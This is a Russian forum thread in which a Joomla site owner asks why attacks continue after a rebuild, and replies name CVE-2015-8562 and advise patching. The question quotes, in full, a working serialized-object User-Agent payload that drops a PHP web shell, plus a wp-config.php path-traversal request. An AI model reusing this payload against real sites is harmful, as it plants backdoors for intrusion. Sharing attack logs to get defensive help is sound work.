Попытки взломать сайт
Страницы: 1
Попытки взломать сайт, CMS Joomla
Приветствую всех! Проблема такая: где-то пол года взломали сайт. Недавно решил восстановить сайт с нуля (на том же домене), однако после его восстановления атаки на сайт не прикратились. На сайте стоит компонент Rsfirewall, который ежедневно сообщает об опасности среднего уровня. Некоторые сообщения говорят о том, что на сайт пытались зайти используя неправильный логи/пароль. Другие указывает на то, что была попытка локального включения файла (более подробная информация - URI: download=../../../wp-config.php
Совпадение: ./ ). И ещё одни сообщения говорят об обнаружении опасного пользовательского агента:

Код
Пользовательский агент: 
}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:253:"file_put_contents($_SERVER["DOCUMENT_ROOT"].chr(47)."images".chr(47)."404.php","|=|\x3C".chr(63)."php
 
\x24mujj=\x24_POST['@123'];if(\x24mujj!=''){\x24xsser=base64_decode(\x24_POST['z0']);@eval(\"\\\x24safedg=\x24xsser;\");}");JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}~
               
 


 Я баню IP через которые происходят атаки (и вообще внёс в чёрный список почти все страны), но атаки не прекращаются с других адресов. Что это за атаки и как возможно максимально обезопасить себя от них?

Прогон по твиттеру, постинг в 1500 аккунтов
Постинг в твиттер аккаунты, для ускорения индексации ваших сайтов, сателлитов, дорвеев.

Атакуют джумлу через сплойт, подробно описанный www.skillz.ru/dev/php/article-Joomla-remote-code-vulnerability-cve-2015-8562.html]тутМожно либо обновить PHP, либо джумлу. 
Цитата
1. session_decode исправлен в PHP начиная с 5.5.29, 5.6.13 (если у вас актуальные версии - ваш сайт в безопасности).
2. Уязвимость закрыта в Joomla 3.4.6
Бан айпи - это не выход, а мелкая неприятность для хакера. 

Добавьте basic авторизацию на админку
Цитата
siteclean пишет:
Атакуют джумлу через сплойт, подробно описанный www.skillz.ru/dev/php/article-Joomla-remote-code-vulnerability-cve-2015-8562.html]тутМожно либо обновить PHP, либо джумлу.
Цитата
1. session_decode исправлен в PHP начиная с 5.5.29, 5.6.13 (если у вас актуальные версии - ваш сайт в безопасности).
2. Уязвимость закрыта в Joomla 3.4.6
Бан айпи - это не выход, а мелкая неприятность для хакера.

Добавьте basic авторизацию на админку
Спасибо! Не подскажите как сделать такую авторизацию?
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
14:57 BotYandex 
14:21 Lottery Partner в поиске партнеров! Самые высокие ставки! 
13:58 Мои сайты теперь мои 
13:28 Продвинуть сайт в топ яндекса. 
11:17 АП ИКС 27.12.2019 
09:49 Пишу скрипты (PHP) за небольшую плату 
00:20 Выход из Холстового Баден-Баден 
10:48 Вечные ссылки с ТОПОВЫХ ресурсов! Размещение вечных трастовых ссылок с тИЦ от + 1000 до +45000 
09:11 Profit-smm.ru - раскрутка в Vk/Inst/Yt/Tg. Подписчики от 17.9р, лайки от 7р за сотню. 
02:58 Продвижения вашего сайта прогонами по базе с ИСК до 46000. Рост позиций по СЧ и НЧ запросам + рост ИКС 
21:15 Продаю или обменяю wallet.dat от Bitcoin Core с утерянными паролями на вывод 
19:39 A-Parser 1.1 - продвинутый парсер поисковых систем, Suggest, PR, DMOZ, Whois, etc 
17:00 BestChange – обменивать электронную валюту можно быстро и выгодно 
17:00 Выполняю аудит безопасности сайта с корректировкой проблемных зон 
05:00 Как подкрутить посещаемость сайта 
20:22 Базы email недорого, или на заказ 
17:36 Timphenix - осторожно, мошенник 
13:37 S-SMM.RU - Лучшая автоматическая SMM панель для раскрутки во всех соц.сетях. Низкие цены + API + Партнерка 
12:51 Правительство поддержало законопроект об идентификации пользователей электронной почты 
12:21 Редирект с http на https 
10:57 Фото наших рабочих мест. Не проходи мимо!